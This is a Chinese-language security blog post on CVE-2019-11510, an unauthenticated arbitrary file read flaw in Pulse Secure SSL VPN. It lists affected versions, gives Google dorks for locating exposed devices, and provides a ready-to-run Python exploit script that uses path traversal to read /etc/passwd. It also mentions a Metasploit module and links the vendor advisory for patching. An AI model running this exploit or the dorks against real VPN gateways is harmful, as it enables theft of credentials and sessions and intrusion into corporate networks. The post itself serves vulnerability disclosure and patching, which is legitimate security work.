MENU

Pulse Secure SSL VPN任意文件读取(CVE-2019-11510)

August 29, 2019 • Read: 133 • 安全阅读设置

0x01 漏洞概述

Pulse Secure Pulse Connect Secure(又名PCS,前称Juniper Junos Pulse)是美国Pulse Secure公司的一套SSL VPN解决方案。爆发的CVE-2019-11510该漏洞是由于所引入的一项通过浏览器访问其他端口的新功能缺乏安全限制所导致的,任意攻击者都可在未经身份验证的情况下利用该漏洞,读取系统敏感文件,获取session、明文密码等敏感信息,从而非法入侵并操控VPN,从而进一步威胁企业内网服务。
  • 影响版本
Pulse Secure PCS 9.0RX
Pulse Secure PCS 8.3RX
Pulse Secure PCS 8.2RX
Pulse Secure PCS 8.1R15.1
  • CVE编号
CVE-2019-11510
  • 公开时间
2019-08-21
  • 组件Dork
inurl:/dana-na/ filetype:cgi
inurl:remote/login?lang=en
remote/login +app:"Fortinet SSL VPN"

0x02 漏洞利用

  • Pcs_Ssl_Vpn_CVE_2019_11510@Coco413.py
# -*- coding:utf-8 -*-
# !/usr/bin/env python

import sys
import urlparse
import requests
import warnings
import traceback

reload(sys)
sys.setdefaultencoding('utf-8')
requests.packages.urllib3.disable_warnings()
warnings.filterwarnings("ignore")

def CVE_2019_11510(base_url):
    try:
        payloads, keywords = "/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/", "root:x"
        r = requests.get(base_url + payloads, verify=False)
        r.close()
        if keywords in r.text:
            print "[✓] Found CVE-2019-11510 Vuln address(curl --path-as-is -s -k <target>):\n{}\n{}".format(
                base_url + payloads, r.content)
        else:
            print "[x] Not Found Vuln!"
    except requests.exceptions.ConnectionError:
        pass
    except requests.ReadTimeout:
        pass
    except:
        traceback.print_exc()

if __name__ == '__main__':
    if len(sys.argv) == 1:
        print '[+] Tip: python Pcs_Ssl_Vpn_CVE_2019_11510@Coco413.py <url>'
        sys.exit(0)
    url = sys.argv[1]
    CVE_2019_11510(urlparse.urlparse(url).scheme + "://" + urlparse.urlparse(url).hostname)

  • Metasploit

Pulse Secure - System file leak


0x03 漏洞修复

Pulse Secure官方下载最新版本进行修复:https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101


0x04 漏洞引用

【漏洞预警】Pulse Secure SSL VPN任意文件读取